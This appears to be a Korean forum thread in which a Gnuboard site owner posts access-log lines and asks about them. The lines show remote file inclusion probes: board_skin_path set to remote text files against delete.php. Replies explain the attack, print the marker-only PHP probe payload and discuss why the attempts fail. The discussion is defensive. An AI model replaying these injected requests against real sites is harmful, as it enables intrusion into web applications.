수상한 리퍼러.... 전문가분의 조언 바랍니다. 정보
수상한 리퍼러.... 전문가분의 조언 바랍니다.본문
72.34.235.197
/nu/bbs//delete_all.php?board_skin_path=http://주소/sex/id2??
72.34.235.197
/nu/bbs/delete.php//delete_all.php?board_skin_path=http://주소/shop/images/uploads/.../.../1.txt??
/nu/bbs//delete_all.php?board_skin_path=http://주소/shop/images/uploads/.../.../1.txt??
38.99.120.74
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
121.149.207.114
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/data/id1.txt?
/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php?board_skin_path=http://주소/data/id1.txt?
/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/data/id1.txt?
219.255.134.109
/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/data/id1.txt?
/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php?board_skin_path=http://주소/data/id1.txt?
121.78.118.94
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
38.99.120.74
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
(뭔가 문제가 될 것 같아서 웹사이트 URL은 모두 '주소'로 대체 하였습니다.)
제 웹사이트에 알 수없는 리퍼러가 찍힙니다.
저 아이피 주소로 접속 해보면 일 반 평범한 사이트들이 나옵니다. (일반 쇼핑몰이나.. 등등)
그리고 board_skin_path뒤에 오는 주소로 접속 해보면 또 다른 사이트 입니다.
그리고 board_skin_path뒤에 붙어있는 풀 주소로...
http://주소/userfiles/id1.txt??? 이렇게 접속 해보면
/* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */
이런 코드가 나옵니다..
일단 뭔가 수상해서 common.php 파일을 열어서 최 상단에 아래와 같이 적어주었습니다.
if(strstr($board_skin_path,'/')) {exit();}
위 리퍼러의 정체가 뭔가요???
/nu/bbs//delete_all.php?board_skin_path=http://주소/sex/id2??
72.34.235.197
/nu/bbs/delete.php//delete_all.php?board_skin_path=http://주소/shop/images/uploads/.../.../1.txt??
/nu/bbs//delete_all.php?board_skin_path=http://주소/shop/images/uploads/.../.../1.txt??
38.99.120.74
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
121.149.207.114
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/data/id1.txt?
/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php?board_skin_path=http://주소/data/id1.txt?
/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/data/id1.txt?
219.255.134.109
/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/data/id1.txt?
/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/data/id1.txt?
/nu/bbs/delete.php?board_skin_path=http://주소/data/id1.txt?
121.78.118.94
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
38.99.120.74
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
(뭔가 문제가 될 것 같아서 웹사이트 URL은 모두 '주소'로 대체 하였습니다.)
제 웹사이트에 알 수없는 리퍼러가 찍힙니다.
저 아이피 주소로 접속 해보면 일 반 평범한 사이트들이 나옵니다. (일반 쇼핑몰이나.. 등등)
그리고 board_skin_path뒤에 오는 주소로 접속 해보면 또 다른 사이트 입니다.
그리고 board_skin_path뒤에 붙어있는 풀 주소로...
http://주소/userfiles/id1.txt??? 이렇게 접속 해보면
/* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */
이런 코드가 나옵니다..
일단 뭔가 수상해서 common.php 파일을 열어서 최 상단에 아래와 같이 적어주었습니다.
if(strstr($board_skin_path,'/')) {exit();}
위 리퍼러의 정체가 뭔가요???
추천
0
0
댓글 5개
자문자답입니다.
위 리퍼러는 제 사이트에 대한 해킹 시도네요...(뭐 볼게 있다고)
원격 서버에 있는 어떤 파일의 php 코드를 실행하는 거 같습니다. 코드는
/* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */
이거구요 (이게 뭘 의미 하는지는 저는 모르겠습니다.)
구글 검색을 해보니 위 코드 자체는 그리 대단한건 아니라고 하는거 같습니다.
그냥 사이트 취약점을 찾는거고 위 코드가 성공하면 좀 더 복잡한 해킹 시도가 이루어 진다는데...
(영어라 이 내용이 정확한지는 모르겠다.)
그래서 해결책은 뭐니????????
위 리퍼러를 클릭 하였을때 모두 오류 메시지를 출력하는 걸로 봐서는 성공은 아닌 것 같은데
잘 모르겠네요...ㅜㅜ
위 리퍼러는 제 사이트에 대한 해킹 시도네요...(뭐 볼게 있다고)
원격 서버에 있는 어떤 파일의 php 코드를 실행하는 거 같습니다. 코드는
/* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */
이거구요 (이게 뭘 의미 하는지는 저는 모르겠습니다.)
구글 검색을 해보니 위 코드 자체는 그리 대단한건 아니라고 하는거 같습니다.
그냥 사이트 취약점을 찾는거고 위 코드가 성공하면 좀 더 복잡한 해킹 시도가 이루어 진다는데...
(영어라 이 내용이 정확한지는 모르겠다.)
그래서 해결책은 뭐니????????
위 리퍼러를 클릭 하였을때 모두 오류 메시지를 출력하는 걸로 봐서는 성공은 아닌 것 같은데
잘 모르겠네요...ㅜㅜ
데이터폴더에 직접 업로드를 하는 방식인가요 ?
업로드는 아닙니다.
주소창의 URL의 변수를 이용해서 코드 실행의 성공 여부만 체크 하는겁니다.
위 리퍼러가 모두 오류 메시지를 출력 하는걸로 봐서는 모두 실패로 보입니다.
주소창의 URL의 변수를 이용해서 코드 실행의 성공 여부만 체크 하는겁니다.
위 리퍼러가 모두 오류 메시지를 출력 하는걸로 봐서는 모두 실패로 보입니다.
아 그렇군요 ..
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
근데 이해가 안가는게 delete.php 이쪽만 접속 하는걸로 보이는데 ..
bbs/delete.php 는 이미 그누보드에 파일이 있는 것이고
delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
이렇게 접근을 해도 접근이 되나요 ??
뒤에 것은 뭔가요 ? 이해가 전혀 가지 않는 접속 경로네요 ^^;;
/nu/bbs/delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
근데 이해가 안가는게 delete.php 이쪽만 접속 하는걸로 보이는데 ..
bbs/delete.php 는 이미 그누보드에 파일이 있는 것이고
delete.php/delete.php?board_skin_path=http://주소/userfiles/id1.txt???
이렇게 접근을 해도 접근이 되나요 ??
뒤에 것은 뭔가요 ? 이해가 전혀 가지 않는 접속 경로네요 ^^;;
그누보드가 어떻게 돌아가는지 안다면 저런짓은 하지않을텐데
아마도 그누에 대해서 모르는 사람 짓일 겁니다
delete.php?board_skin_path=http://주소/userfiles/id1.txt???
이건 delete.php에다가 board_skin_path 값을 전송해서 어떻게 되는지 보려는 시도 같습니다
의문의 사이트에 있는 id1.txt 화일이 실행되어서 "FeeL"."CoMz" 이 출력되는지 보려는 것 같네요
/* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ <== 이 부분
board_skin_path값을 저렇게 GET 방식으로 넘겨도 delete.php 화일내의 코드가 실행 되기도 전에
사라져버립니다(common.php에서)
즉 http://주소/userfiles.........이 부분은 common.php 또는 delete.php를 변조시키지않은 이상 실행될 수 없습니다
사이트 트래픽을 높이는 외는 별다른 짓을 할 수가 없기는 하지만 혹시 모르니 common.php 와 delete.php 변조 여부를 살펴보세요
아이피는 무작위로 만들어낸 가짜 아이피일 가능성이 높군요
아마도 그누에 대해서 모르는 사람 짓일 겁니다
delete.php?board_skin_path=http://주소/userfiles/id1.txt???
이건 delete.php에다가 board_skin_path 값을 전송해서 어떻게 되는지 보려는 시도 같습니다
의문의 사이트에 있는 id1.txt 화일이 실행되어서 "FeeL"."CoMz" 이 출력되는지 보려는 것 같네요
/* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ <== 이 부분
board_skin_path값을 저렇게 GET 방식으로 넘겨도 delete.php 화일내의 코드가 실행 되기도 전에
사라져버립니다(common.php에서)
즉 http://주소/userfiles.........이 부분은 common.php 또는 delete.php를 변조시키지않은 이상 실행될 수 없습니다
사이트 트래픽을 높이는 외는 별다른 짓을 할 수가 없기는 하지만 혹시 모르니 common.php 와 delete.php 변조 여부를 살펴보세요
아이피는 무작위로 만들어낸 가짜 아이피일 가능성이 높군요